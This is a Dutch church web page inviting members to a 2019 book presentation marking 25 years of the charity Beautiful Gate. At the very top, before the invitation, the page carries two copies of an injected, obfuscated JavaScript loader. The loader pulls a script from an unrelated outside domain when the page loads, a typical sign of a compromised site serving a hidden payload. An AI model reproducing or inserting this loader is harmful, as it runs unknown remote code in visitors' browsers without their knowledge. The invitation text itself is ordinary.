;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Beautiful Gate 25 jaar ... Uitnodiging Boekpresentatie ‘Durf te Vragen' door Toby en Aukje Brouwer - PKN Damwâld
31 augustus 2019
10:00 t/m 12:00
Ferbindingstsjerke
Beautiful Gate 25 jaar … Uitnodiging Boekpresentatie ‘Durf te Vragen’ door Toby en Aukje Brouwer

Hartelijke groeten uit ‘De Westereen’. Dit jaar bestaat Beautiful Gate 25 jaar en we hopen dit op zaterdagmorgen 31 augustus van 10 – 12 uur in de Protestantse Gemeente in de Westereen te vieren door onze ervaringen in boekvorm uit te gegeven. De titel van het boek wat we geschreven hebben is ‘Durf te vragen’, waarin we vertellen wat ons ooit motiveerde om Nederland te verlaten en te gaan wonen en werken in een post apartheid Zuid-Afrika en wat we zoal hebben meegemaakt. Het boek beschrijft ons verhaal met de ups en downs en hoe Gods liefde en compassie zichtbaar wordt door mensen die samen het lichaam van Christus vormen en die samen graag Jezus voorbeeld willen navolgen. We zijn bijzonder dankbaar dat het werk van Beautiful Gate zo breed door de kerk in Friesland ondersteund wordt, dus is ons verhaal ook uw verhaal. Samen hebben we de afgelopen 25 jaar hoop, geloof en liefde mogen delen met kansarme kinderen, gebroken gezinnen en verdeelde leefgemeenschappen in Afrika.

Onder het motto, Ons verhaal is ook uw verhaal willen we de gemeente in Damwoude van harte uitnodigen voor de boekpresentatie / 25 jaar Beautiful Gate.

 

Uitnodiging Boekpresentatie ‘Durf te Vragen’ door Toby en Aukje Brouwer
31 augustus Protestantse Gemeente ‘De Westereen’
10.00 – 12.00 uur
Toerstrjitte 1, De Westereen

Aanmelden is niet nodig.
De koffie staat klaar om 10 uur en iedereen is van harte welkom.

Hartelijke groeten,
Toby en Aukje Brouwer

Meer info over Beautifulgate ?
Locatie: FerbindingstsjerkeToerstrjitte 1, 9271 BP De Westereen